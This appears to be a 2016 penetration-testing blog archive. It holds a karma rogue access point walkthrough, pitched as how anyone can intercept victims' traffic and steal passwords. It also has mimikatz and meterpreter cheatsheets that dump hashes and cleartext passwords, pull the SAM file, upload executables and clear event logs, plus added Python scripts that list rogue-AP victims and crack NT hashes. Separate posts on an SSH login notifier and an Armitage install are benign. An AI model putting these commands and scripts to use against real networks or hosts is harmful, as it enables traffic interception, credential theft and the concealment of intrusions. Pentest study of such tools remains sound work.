12 Sep 2016, 19:09

Wireless Tricks

Wireless has been a great benefit to everyone, from the person drinking coffee at their local coffee shop to the salesperson checking their email. Security was an afterthought in the original design of the 802.11 standards, and this has led to attackers being able to see and steal other people's traffic.

In this post I will partially demonstrate how an average Joe can set up their wireless gear to:

  • Sniff data (Man-in-the-Middle)
  • Steal your personal Active Directory password (NetNTLMv2)
  • Inject malicious code.

The list above could go on indefinitely, as the attacker has full control over the victim's traffic in both directions.

Let's start with a simple one, namely the Karma attack.

Karma Attack

The concept of a karma attack is pretty simple, let’s take a look at the below diagram:

                                    Normal Probe Request


                             Probe Request: My Home Wifi
    Broadcasts probes        Probe Request: Work Wifi               Listens for probes
    +------------------+     Probe Request: Coffeshop Wifi         +-------------------+
    |                  +------------------------------------------->        Home       |
    |  Phone / Laptop  |                                           |  Wireless Router  |
    |                  <-------------------------------------------+                   |
    +------------------+      Probe Response: My Home Wifi         +-------------------+
    Listens for beacons       Beacon:         My Home Wifi          Broadcasts beacons

In the diagram above, a user's phone/laptop at home continuously probes for the access points it has previously connected to, namely:

Probe Request: My Home Wifi
Probe Request: Work Wifi
Probe Request: Coffeshop Wifi

The wireless router at home receives the probe request for My Home Wifi and answers "Hello, I'm here!".

This is where the initial handshake, DHCP lease and so on take place, and the user is connected to their home network.

An attacker can take advantage of this design; consider the following diagram:

                     Probe Request: My Home Wifi
 Broadcasts probes   Probe Request: Work Wifi        Listens for probes                Listens for probes
+------------------+ Probe Request: Coffeshop Wifi +---------------------+           +-------------------+
|                  +------------------------------->                     +----------->    Coffee shop    |
|  Phone / Laptop  |                               |  Hacker's Karma AP  |  Traffic  |  Wireless Router  |
|                  <-------------------------------+                     <-----------+                   |
+------------------+ Probe Response: My Home Wifi  +---------------------+           +-------------------+
 Listens for beacons Beacon:         My Home Wifi    Broadcasts Beacons                Broadcasts Beacons

Let's say a user is sitting at a local coffee shop where an attacker has set up a karma access point. The user's device still probes for the access points stored on it.

The attacker's access point responds to any of those requests, and the user's device connects, believing it has found the legitimate access point; in the case above, the user (at the local coffee shop) is now connected to "My Home Wifi" as served by the attacker.

The attacker can now forward all of the user's traffic via the coffee shop network while having full access to it.

One caveat: a karma access point on its own only wins against remembered networks that were open. For a remembered WPA2 network the client still expects to complete the 4-way handshake with a key the attacker does not have, so an association like the one shown here leads nowhere unless credentials are also captured or cracked.

Karma Setup

The Gear

  • TP-LINK TL-WN722N
  • Alfa ARS-N19 omni-directional 9 dBi antenna
  • Kali VM

Let's set up our own karma access point. I will make use of SensePost's hostapd-mana for this (thanks to SensePost for the repo):

git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana/hostapd && make

The above commands will clone the hostapd-mana git repository, and compile the hostapd executable for you.

Once this is done, it is time to set up the wireless adapter on the Kali Virtual Machine.

Insert your wireless adapter and type the following in your terminal:

iwconfig

This should print out your currently active wireless interfaces, below is an example of what it could look like:

[root@kali]$ iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0 is my TP-Link adapter, which I will use for this attack; yours might be wlan1 or similar, so just remember the interface name.

Next we need to stop NetworkManager and wpa_supplicant from fighting over the adapter and put the wlan0 interface into monitor mode, with the following commands:

airmon-ng check kill
airmon-ng start wlan0

This creates a new interface in monitor state; to verify, run iwconfig again. (hostapd drives the adapter through nl80211 and switches it into AP mode itself when it starts, so the part of this step that really matters is the check kill: it makes sure no other daemon is holding the interface.)

[root@kali]$ iwconfig
wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

As you can see, my wireless interface name has changed to wlan0mon; don't be alarmed if yours is something like mon0.

Copy the name of the wireless interface, open the config file hostapd.conf (in the hostapd directory you just built in) with your preferred text editor, and make the following changes:

  • Change the line interface=wlan0 to interface=wlan0mon, using the interface name you copied.
  • Change ssid=test (around line 111) to something more inviting; I will make mine ssid=Free Wifi.
  • Check that enable_mana=1 is present. That directive is what makes hostapd-mana answer probes for foreign SSIDs; without it you have a plain hostapd access point.

Running hostapd

Type the following to start the karma attack:

./hostapd hostapd.conf

Sample output could be as follows:

[root@kali]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED

As you can see, we now have an access point broadcasting the SSID Free Wifi, but whenever a directed probe request for some other SSID arrives from a victim, hostapd-mana answers that probe as if it were that SSID, so the victim's device connects to our access point.

The below output shows a successful connection to our karma access point:

[root@winter hostapd (master ✗)]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: authenticated
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: associated (aid 1)
wlan0mon: AP-STA-CONNECTED 6c:72:e7:98:9e:22
MANA - Successful association of 6c:72:e7:98:9e:22 to ESSID 'My Home Wifi'
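After an engagement the interesting question is which clients leaked which remembered SSIDs, and which of those probes actually turned into an association. The following is an added example, not part of the original post or of hostapd-mana: it parses the two MANA log lines shown above (directed probe for a foreign SSID, successful association) and summarises them per client. The SAMPLE_LOG, including the second client MAC 02:11:22:33:44:55, is constructed from the output format above.

```python
"""Summarise what clients leaked to a hostapd-mana karma AP.

Added example, not part of the original post or of hostapd-mana. Parses
the MANA log lines for directed probes and successful associations and
reports, per client MAC, which remembered SSIDs it probed for and which
of those it joined on the rogue AP. SAMPLE_LOG is constructed.
"""
import re
import sys
from collections import defaultdict

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
PROBE_RE = re.compile(
    r"MANA - Directed probe request for foreign SSID '(?P<ssid>.*)' from (?P<mac>%s)" % MAC)
ASSOC_RE = re.compile(
    r"MANA - Successful association of (?P<mac>%s) to ESSID '(?P<ssid>.*)'" % MAC)


def parse_mana_log(lines):
    """Return {mac: {"probed": set of SSIDs, "joined": set of SSIDs}}."""
    clients = defaultdict(lambda: {"probed": set(), "joined": set()})
    for line in lines:
        m = PROBE_RE.search(line)
        if m:
            clients[m["mac"]]["probed"].add(m["ssid"])
            continue
        m = ASSOC_RE.search(line)
        if m:
            clients[m["mac"]]["joined"].add(m["ssid"])
    return dict(clients)


def karma_victims(clients):
    """Clients that joined an SSID they had probed for: the attack landed."""
    return {mac: sorted(c["probed"] & c["joined"])
            for mac, c in clients.items() if c["probed"] & c["joined"]}


def report(clients):
    """Human-readable lines, one per client, in MAC order."""
    out = []
    for mac in sorted(clients):
        c = clients[mac]
        out.append("%s probed %d SSID(s) %s; joined: %s" % (
            mac, len(c["probed"]), sorted(c["probed"]),
            sorted(c["joined"]) or "none"))
    return out


# Constructed sample in the format hostapd-mana prints (see output above).
SAMPLE_LOG = """\
wlan0mon: AP-ENABLED
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'Work Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: associated (aid 1)
MANA - Successful association of 6c:72:e7:98:9e:22 to ESSID 'My Home Wifi'
MANA - Directed probe request for foreign SSID 'Coffeshop Wifi' from 02:11:22:33:44:55
""".splitlines()

if __name__ == "__main__":
    # Usage: python3 mana_summary.py [hostapd-mana log file]
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    clients = parse_mana_log(lines)
    for line in report(clients):
        print(line)
    print("victims:", karma_victims(clients))
```

Run it against the saved stdout of hostapd (`./hostapd hostapd.conf | tee mana.log`); a client that appears under victims is one whose remembered-network list was successfully impersonated, which is the finding worth writing up.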

04 Sep 2016, 21:31

mimikatz cheatsheet

Let's talk about mimikatz. I have had the pleasure of playing with this tool in a few penetration tests, and it has been VERY useful. Mimikatz was designed with a focus on extracting LM and NTLM hashes, with the added benefit of showing cleartext passwords sitting in memory, in addition to many other functions.

I have created a demo using a Windows 7 x86 machine to show you how it works. The username is dev with password password.

Our demo makes use of a Metasploit installation in a Docker container (thanks remnux) where the multi/handler is running.

Lets begin.

Getting a shell has been taken care of for us with psexec:

msf exploit(handler) > 
[*] Sending stage (957999 bytes) to 10.0.0.114
[*] Meterpreter session 1 opened (172.17.0.2:2222 -> 10.0.0.114:49417) at 2016-09-04 19:20:27 +0000

msf exploit(handler) >

Done, now we have a session to play with. Let's make sure we have only one session:

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  dev-PC\dev @ DEV-PC  172.17.0.2:2222 -> 10.0.0.114:49417 (10.0.0.114)

msf exploit(handler) >

Now we jump into that session, with the below example.

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

The most important thing about mimikatz is its ability to extract credentials in whatever form you like; however, reading them out of LSASS memory requires the session to run as SYSTEM (or at least as an administrator holding SeDebugPrivilege). In the example below we are running as the logged-on user dev, which will not do.

meterpreter > getuid
Server username: dev-PC\dev
meterpreter > 

As mentioned above, we need to be SYSTEM for this demo, so run the native meterpreter command getsystem. It does not migrate the process; it escalates the current session to SYSTEM, here through named-pipe impersonation, which only works because the session already has local administrator rights. Afterwards run getuid again to confirm.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now that the most important step is done, we can recon the system for fun before we grab all the creds.

meterpreter > sysinfo
Computer        : DEV-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

From here we can load mimikatz which will be the module of focus in this post.

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

After loading mimikatz, we print its help to make sure it is listening to us.

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter >

If you wanted to check the version of mimikatz for some reason, you can do that by using the mimikatz_command.

meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Jul 11 2016 21:35:47)
meterpreter >

Reading hashes and passwords from memory can be done in two ways.

You can use both the mimikatz built-in commands and mimikatz's own command syntax to extract passwords from memory. Let's look at the built-in native method first.

Let's dump the NTLM/LM hashes using the built-in meterpreter method.

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;103437  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;103396  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     DEV-PC$        n.s. (Credentials KO)
0;22584   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     DEV-PC$        n.s. (Credentials KO)

meterpreter >

Now use the built-in method to extract cleartext passwords from memory. You will see that the password for user dev is password, as explained at the beginning. (The ntlm{…} value above, 8846f7eaee8fb117ad06bdd830b7586c, is MD4 of the UTF-16LE encoding of "password", and the lm{…} value is the LM hash of the same string, so either can be checked against a wordlist offline without ever seeing the cleartext.)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     DEV-PC$        
0;22584   NTLM                                    
0;999     NTLM       WORKGROUP     DEV-PC$        
0;103437  NTLM       dev-PC        dev            password
0;103396  NTLM       dev-PC        dev            password

meterpreter >

Now let’s look at the mimikatz crafted commands to do the same thing.

Let's dump the SAM hashes with mimikatz_command -f samdump::hashes. Note that the Administrator NTLM value below, 31d6cfe0d16ae931b73c59d7e0c089c0, is the NT hash of an empty password.

meterpreter > mimikatz_command -f samdump::hashes
Computer   : dev-PC
BootKey    : d20b4e2698ac8389dd909b1b389ab826

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1001
User : dev
LM   : 
NTLM : 8846f7eaee8fb117ad06bdd830b7586c

Rid  : 1002
User : HomeGroupUser$
LM   : 
NTLM : 022fff2ba68fb20d5a32145c43912fa0
meterpreter > 
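The hashes above can be verified offline. As an added example (not the original post's output and not mimikatz code), here is a small checker: the NT hash is MD4 of the password encoded as UTF-16LE, implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3. SAMPLE_DUMP is copied from the samdump::hashes output above; the wordlist is constructed.

```python
"""Check hashes dumped with samdump::hashes against candidate passwords.

Added example, not the original post's output or mimikatz code. NT hash =
MD4(UTF-16LE(password)); MD4 is implemented here (RFC 1320) so the script
does not depend on hashlib's legacy md4. SAMPLE_DUMP comes from the
mimikatz output above; WORDLIST is constructed.
"""
import re
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(fn, state, x, order, shifts, k):
    # One 16-step MD4 round; rotating (a, b, c, d) after each step gives
    # the a/d/c/b update order of the reference algorithm.
    a, b, c, d = state
    for i, idx in enumerate(order):
        a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return [a, b, c, d]


def md4(data):
    """RFC 1320 MD4 digest of `data` (bytes)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = _md4_round(f, state, x, range(16), (3, 7, 11, 19), 0)
        s = _md4_round(g, s, x, r2, (3, 5, 9, 13), 0x5A827999)
        s = _md4_round(h, s, x, r3, (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(a + b) & MASK for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash as mimikatz prints it: MD4(UTF-16LE(password)), lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_samdump(text):
    """Map user -> NT hash from samdump::hashes output; entries with no hash are skipped."""
    hashes = {}
    user = None
    for line in text.splitlines():
        m = re.match(r"\s*User\s*:\s*(\S+)", line)
        if m:
            user = m.group(1)
            continue
        m = re.match(r"\s*NTLM\s*:\s*([0-9a-fA-F]{32})", line)
        if m and user:
            hashes[user] = m.group(1).lower()
    return hashes


def crack(hashes, wordlist):
    """Return {user: password} for every hash matched by a wordlist entry."""
    table = {nt_hash(w): w for w in wordlist}
    return {u: table[h] for u, h in hashes.items() if h in table}


SAMPLE_DUMP = """
Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 1001
User : dev
LM   :
NTLM : 8846f7eaee8fb117ad06bdd830b7586c
"""
WORDLIST = ["", "password", "Password1", "letmein"]   # constructed

if __name__ == "__main__":
    for user, pw in crack(parse_samdump(SAMPLE_DUMP), WORDLIST).items():
        print("%-14s %s" % (user, "<empty>" if pw == "" else pw))
```

Paste the real samdump::hashes output in place of SAMPLE_DUMP and point WORDLIST at a proper list; the empty string belongs in every wordlist, since 31d6cfe0d16ae931b73c59d7e0c089c0 shows up on far more hosts than one would hope.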

And naturally we can extract the passwords held in memory too, using mimikatz_command -f sekurlsa::searchPasswords. Here again we see that user dev's password is password.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { dev ; dev-PC ; password }
[1] { dev ; dev-PC ; password }
[2] { dev-PC ; dev ; password }
[3] { dev-PC ; dev ; password }
[4] { dev ; dev-PC ; password }
[5] { dev ; dev-PC ; password }
meterpreter >

Another useful command in the mimikatz bag is service. With it you can list, start, stop and remove Windows services. This version of mimikatz prints its help in French; the output below has been translated.

meterpreter > mimikatz_command -f service::
Module : 'service' identified, but command '' not found

Module description : Service manipulation
        list	- Lists services and drivers
       start	- Starts a service or driver
        stop	- Stops a service or driver
      remove	- Removes a service or driver
    mimikatz	- Installs and/or starts the mimikatz driver
meterpreter > 

meterpreter > mimikatz_command -f service::list
	KERNEL_DRIVER	STOPPED	1394ohci	1394 OHCI Compliant Host Controller
	KERNEL_DRIVER	RUNNING	ACPI	Microsoft ACPI Driver
	KERNEL_DRIVER	STOPPED	AcpiPmi	ACPI Power Meter Driver
 3568	WIN32_OWN_PROCESS	RUNNING	AdobeARMservice	Adobe Acrobat Update Service
	KERNEL_DRIVER	STOPPED	adp94xx	adp94xx
	KERNEL_DRIVER	STOPPED	adpahci	adpahci
	KERNEL_DRIVER	STOPPED	adpu320	adpu320
	WIN32_SHARE_PROCESS	STOPPED	AeLookupSvc	Application Experience
	KERNEL_DRIVER	RUNNING	AFD	Ancillary Function Driver for Winsock
	KERNEL_DRIVER	STOPPED	agp440	Intel AGP Bus Filter
	KERNEL_DRIVER	STOPPED	aic78xx	aic78xx
	WIN32_OWN_PROCESS	STOPPED	ALG	Application Layer Gateway Service
	KERNEL_DRIVER	STOPPED	aliide	aliide
	KERNEL_DRIVER	STOPPED	amdagp	AMD AGP Bus Filter Driver
	KERNEL_DRIVER	STOPPED	amdide	amdide
	KERNEL_DRIVER	STOPPED	AmdK8	AMD K8 Processor Driver
	KERNEL_DRIVER	STOPPED	AmdPPM	AMD Processor Driver
	KERNEL_DRIVER	STOPPED	amdsata	amdsata
	KERNEL_DRIVER	STOPPED	amdsbs	amdsbs
	KERNEL_DRIVER	RUNNING	amdxata	amdxata
	KERNEL_DRIVER	STOPPED	AppID	AppID Driver
	WIN32_SHARE_PROCESS	STOPPED	AppIDSvc	Application Identity
 1284	WIN32_SHARE_PROCESS	RUNNING	Appinfo	Application Information
	WIN32_SHARE_PROCESS	STOPPED	AppMgmt	Application Management
	KERNEL_DRIVER	STOPPED	arc	arc
	KERNEL_DRIVER	STOPPED	arcsas	arcsas
	KERNEL_DRIVER	STOPPED	AsyncMac	RAS Asynchronous Media Driver
	KERNEL_DRIVER	RUNNING	atapi	IDE Channel
 1256	WIN32_SHARE_PROCESS	RUNNING	AudioEndpointBuilder	Windows Audio Endpoint Builder
 1224	WIN32_SHARE_PROCESS	RUNNING	Audiosrv	Windows Audio
	WIN32_SHARE_PROCESS	STOPPED	AxInstSV	ActiveX Installer (AxInstSV)
	KERNEL_DRIVER	STOPPED	b06bdrv	Broadcom NetXtreme II VBD
<snip><snip><snip><snip><snip>
meterpreter >

You might think that having the ability to play with services gives you a little more power, and you are 100% correct. Mimikatz can also extract certificates and private keys (amongst other things) using the crypto module. See below (help translated from the French original).

meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identified, but command '' not found

Module description : Cryptography and certificates
listProviders	- Lists the installed providers
  listStores	- Lists the system stores
listCertificates	- Lists certificates
    listKeys	- Lists key containers
exportCertificates	- Exports certificates
  exportKeys	- Exports keys
    patchcng	- [experimental] Patches the key manager to export non-exportable keys
   patchcapi	- [experimental] Patches the current CryptoAPI to export non-exportable keys
meterpreter > 

meterpreter > mimikatz_command -f crypto::listProviders
CryptoAPI providers :
	Microsoft Base Cryptographic Provider v1.0
	Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Base DSS Cryptographic Provider
	Microsoft Base Smart Card Crypto Provider
	Microsoft DH SChannel Cryptographic Provider
	Microsoft Enhanced Cryptographic Provider v1.0
	Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Enhanced RSA and AES Cryptographic Provider
	Microsoft RSA SChannel Cryptographic Provider
	Microsoft Strong Cryptographic Provider

CNG providers :
	Microsoft Primitive Provider
	Microsoft Smart Card Key Storage Provider
	Microsoft Software Key Storage Provider
	Microsoft SSL Protocol Provider
meterpreter >

remember, don’t harm anyone with this knowledge.

stay tuned for more fun.

…the end.

29 Aug 2016, 16:22

meterpreter cheatsheet

Useful commands in Metasploit when spawning meterpreter shells.

uploading a file to a windows host

meterpreter > upload evil_file.exe c:\\windows\\system32
[*] uploading  : evil_file.exe -> c:\windows\system32
[*] uploaded   : evil_file.exe -> c:\windows\system32\evil_file.exe
meterpreter >

downloading a file from a windows host

meterpreter> download c:\\windows\\repair\\sam /tmp

executing uploaded executable on windows target

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

creating a new channel with cmd.exe

meterpreter> execute -f cmd -c

show running processes

meterpreter> ps

open a shell inside a meterpreter session

meterpreter> shell

meterpreter automatic system privileges

meterpreter> getsystem

meterpreter automatic hash dump attempt

meterpreter> hashdump

meterpreter create port forward to another target host

meterpreter> portfwd add -l 80 -p 80 -r <target>

meterpreter> portfwd delete -l 80 -p 80 -r <target>

push meterpreter session to background

meterpreter> background

read text files

meterpreter> cat file.txt

list current working directory on remote host

meterpreter> pwd

c:\windows

clear event logs on the remote system (clears the Application, System and Security event logs). Note that the wipe is itself logged: the Security log records event ID 1102 and the System log event ID 104, so on a monitored host this draws attention rather than avoiding it.

meterpreter> clearev

getting the current user that meterpreter is running as

meterpreter> getuid

idle time of a system

meterpreter > idletime
User has been idle for: 2 hours 14 mins 5 secs
meterpreter >

looking at network information

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

INTEL PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0dc:21:11:f1:11
IP Address  : 192.168.0.1
Netmask     : 255.255.255.0

meterpreter >

29 Aug 2016, 16:22

ssh login push event

Let's set up a push notification for every successful login over SSH. Most mobile apps use push notifications these days, and I think getting one on your phone when someone logs into your server is rather handy and neat.

There are free push notification services on the net such as PushBullet; they have a mobile app and a browser extension, which we will use later in the guide. The main requirement for a good push service is an API interface that you can call.

Here's what we're going to do. Assume I have a standard Ubuntu Server, let's say 16.04 LTS.

What’s required?:


  1. Server: A Linux server would be handy, you can test this on a Linux VM too if you want to try it first, the only requirement is internet access.
  2. Push Service: For this guide, I will use PushBullet. They are stable and fast! Register an account with the service you end up choosing.
  3. Mobile App: I will download the PushBullet App on my mobile phone, you can also install the browser extension.
  4. Register Devices: In PushBullet, once you have a registered account, go ahead and register a device on the account, like a mobile phone using the App or a browser using the browser extensions they provide.
  5. Generate Access Token: Login to your PushBullet portal and select “Settings”, then on the “Account” page you want to add an Access Token this is something we will use to query the API with.
  6. Script: We will develop a script that pulls a few environment variables into a cURL request to the API, which sends the push notification.
  7. Login Trigger: We will call the script from the /etc/profile file, which runs when a login shell starts for any user.

Now create a shell script on the Linux server, call it ssh_notify.sh and place it somewhere like /usr/bin/.scripts/ssh_notify.sh. The dot in front of the folder name keeps it out of a casual ls and makes it less obvious in case of a breach, but it is not access control: the script runs inside every user's login shell, so every user can read it, and the access token inside it along with them. If that matters to you, keep the token in a root-only file and trigger the script from PAM instead of from the user's shell.

Script Content.


  1. Replace ACCESS_TOKEN_HERE with your Access Token generated on the site.
  2. Replace TITLE_HERE with the title you want displayed on your push notification.
  3. You might need to tweak the variables a little depending on your system and output of your environment variables.
#!/bin/bash
# SSH_CONNECTION is "client_ip client_port server_ip server_port"
ClientIP=$(echo "$SSH_CONNECTION" | awk '{ print $1 }')
ServerIP=$(echo "$SSH_CONNECTION" | awk '{ print $3 }')
NOW=$(date +"%Y %m %d %T")
Body="$USER logged into $ServerIP from $ClientIP at $NOW"
curl -s --header 'Access-Token: ACCESS_TOKEN_HERE' -X POST https://api.pushbullet.com/v2/pushes \
     --header 'Content-Type: application/json' \
     --data-binary "{\"type\": \"note\", \"title\": \"TITLE_HERE\", \"body\": \"$Body\"}" > /dev/null

You can test the script by running it from an SSH session (it reads $SSH_CONNECTION, which only sshd sets):

root@server:# ./ssh_notify.sh

You should get a push notification on your phone with the username that logged in and the IP address.

Now we need a mechanism to trigger the script when someone has successfully logged in. For this we use the /etc/profile file: it only runs once authentication has succeeded, so failed login attempts, which we do not want to see, never trigger it.

Edit /etc/profile and add the location of the script at the bottom (as in the example below).

/usr/bin/.scripts/ssh_notify.sh

Now you can logout and log back in to test.

NOTE: Remember that you are sending the push notification to the devices in the default group of the Pushbullet account, so you can add multiple devices there to be notified of logins, handy when more than one person needs to know. Also be aware of what /etc/profile does not cover: it is only read by login shells, so a non-interactive command (ssh host some-command), an scp/sftp transfer, or a user whose login shell does not read /etc/profile will produce no notification. A pam_exec.so hook in /etc/pam.d/sshd fires for every sshd session regardless of shell, runs as root (so the token can live in a root-only file), and receives the user and remote host as PAM_USER and PAM_RHOST.
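The PAM-driven variant, as an added example that is not the original post's script. It assumes a line such as `session optional pam_exec.so /usr/local/sbin/ssh_notify.py` in /etc/pam.d/sshd (wiring not shown on the original page), the token stored in /etc/pushbullet.token with mode 600, and the PAM_USER, PAM_RHOST, PAM_TYPE and PAM_SERVICE variables that pam_exec exports. The payload is built with json.dumps, so a username or hostname containing quotes cannot break the request the way the unquoted $USER could in the cURL version.

```python
#!/usr/bin/env python3
"""Send a Pushbullet note when sshd opens a session, triggered from PAM.

Added example, not the original post's script. Assumes (not on the page):
  /etc/pam.d/sshd:  session optional pam_exec.so /usr/local/sbin/ssh_notify.py
pam_exec runs this as root with PAM_USER, PAM_RHOST, PAM_TYPE and
PAM_SERVICE in the environment, so the token lives in TOKEN_FILE (root-only)
instead of in a script every user can read.
"""
import json
import os
import sys
import time
import urllib.request

TOKEN_FILE = "/etc/pushbullet.token"          # assumption: chmod 600, owned by root
API = "https://api.pushbullet.com/v2/pushes"


def should_notify(env):
    """Fire only when sshd opens a session; ignore auth/account/close phases."""
    return env.get("PAM_TYPE") == "open_session" and env.get("PAM_SERVICE") == "sshd"


def build_push(env, now=None, title="SSH login"):
    """Build the Pushbullet note body from the PAM environment."""
    now = now or time.strftime("%Y-%m-%d %H:%M:%S")
    body = "%s logged into %s from %s at %s" % (
        env.get("PAM_USER", "?"), os.uname().nodename, env.get("PAM_RHOST", "?"), now)
    return {"type": "note", "title": title, "body": body}


def encode_push(push):
    """Serialise the note; json.dumps escapes quotes and control characters."""
    return json.dumps(push).encode("utf-8")


def send_push(push, token, timeout=5):
    req = urllib.request.Request(
        API, data=encode_push(push),
        headers={"Access-Token": token, "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def main():
    if not should_notify(os.environ):
        return 0
    try:
        with open(TOKEN_FILE) as fh:
            token = fh.read().strip()
        send_push(build_push(os.environ), token)
    except Exception as exc:
        # Never block a login because the notification failed; the PAM line is
        # "optional" for the same reason.
        print("ssh_notify: %s" % exc, file=sys.stderr)
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Because the hook runs before any shell, it also catches `ssh host command`, scp and sftp sessions, and the user whose login triggered it never gets to see the token.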

06 Jul 2016, 16:22

installing armitage teamserver

I’m not going to bore you with a write-up on how I struggled to install Metasploit and Armitage on a Ubuntu Server.

here we go.

Install dependencies:

sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

This will make sure we can build everything properly.

Ruby:

(Don't go RVM; there is an issue with a symlink not being created, among other trouble. Instead I will show you the rbenv method. Note that GitHub no longer serves the git:// protocol and the rbenv repositories have since moved to the rbenv organisation, so if the clones below fail, use the https:// form of the URLs.)

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

